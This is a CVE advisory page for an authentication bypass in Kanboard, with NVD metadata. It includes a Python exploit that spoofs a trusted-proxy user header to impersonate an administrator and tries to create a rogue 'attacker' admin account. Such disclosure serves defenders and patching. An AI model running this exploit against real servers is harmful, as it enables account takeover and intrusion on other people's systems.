Security Vulnerability Report
中文
CVE-2026-21881 CVSS 9.1 CRITICAL

CVE-2026-21881

Published: 2026-01-08 02:15:54
Last Modified: 2026-01-20 15:57:23
Source: [email protected]

Description

Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below is vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, by simply sending a spoofed HTTP header. This issue is fixed in version 1.2.49.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:* - VULNERABLE
Kanboard < 1.2.49
Kanboard <= 1.2.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-21881 PoC - Kanboard Authentication Bypass # Target: Kanboard with REVERSE_PROXY_AUTH enabled # This PoC demonstrates how an attacker can impersonate any user TARGET_URL = "http://target-kanboard.com/" TARGET_USER = "admin" # Can be any user including admin def exploit_auth_bypass(): """ Exploit the authentication bypass by sending a crafted HTTP header to impersonate a user without knowing their credentials. """ headers = { # Key header that triggers the vulnerability # Kanboard uses this header when REVERSE_PROXY_AUTH is enabled "X-Authenticated-User": TARGET_USER, # Additional headers that may be checked "X-Forwarded-For": "127.0.0.1", # Spoof trusted IP "X-Real-IP": "127.0.0.1", "User-Agent": "Mozilla/5.0" } # Try to access protected resources session = requests.Session() # Access the dashboard or API endpoints endpoints = [ "?controller=DashboardController&action=show", "?controller=UserViewController&action=show&user_id=1", "?controller=ConfigController&action=index" ] for endpoint in endpoints: try: response = session.get(TARGET_URL + endpoint, headers=headers, timeout=10) print(f"[*] Request to {endpoint}") print(f"[*] Status Code: {response.status_code}") # Check if we successfully impersonated the user if "admin" in response.text.lower() or response.status_code == 200: print("[+] Authentication bypass successful!") print("[+] User impersonation confirmed") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def create_admin_poc(): """ Alternative: Direct API call to create a new admin user Requires the authentication bypass to work first """ headers = { "X-Authenticated-User": "admin", "Content-Type": "application/json" } payload = { "controller": "UserCreationController", "action": "save", "username": "attacker", "password": "Attacker123!", "role": "admin" } response = requests.post(TARGET_URL, headers=headers, data=payload) return response.status_code == 200 if __name__ == "__main__": print("=" * 60) print("CVE-2026-21881 - Kanboard Authentication Bypass Exploit") print("=" * 60) exploit_auth_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21881", "sourceIdentifier": "[email protected]", "published": "2026-01-08T02:15:53.803", "lastModified": "2026-01-20T15:57:22.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below is vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, by simply sending a spoofed HTTP header. This issue is fixed in version 1.2.49."}, {"lang": "es", "value": "Kanboard es un software de gestión de proyectos centrado en la metodología Kanban. Las versiones 1.2.48 e inferiores son vulnerables a una omisión de autenticación crítica cuando REVERSE_PROXY_AUTH está habilitado. La aplicación confía ciegamente en los encabezados HTTP para la autenticación de usuarios sin verificar que la solicitud se originó desde un proxy inverso de confianza. Un atacante puede suplantar a cualquier usuario, incluidos los administradores, simplemente enviando un encabezado HTTP falsificado. Este problema se solucionó en la versión 1.2.49."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.49", "matchCriteriaId": "AFA1D972-E76A-4A20-95F5-68D9915D3797"}]}]}], "references": [{"url": "https://github.com/kanboard/kanboard/commit/7af6143e2ad25b5c15549cca8af4341c7ac4e2fc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kanboard/kanboard/releases/tag/v1.2.49", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/kanboard/kanboard/security/advisories/GHSA-wwpf-3j4p-739w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/kanboard/kanboard/security/advisories/GHSA-wwpf-3j4p-739w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.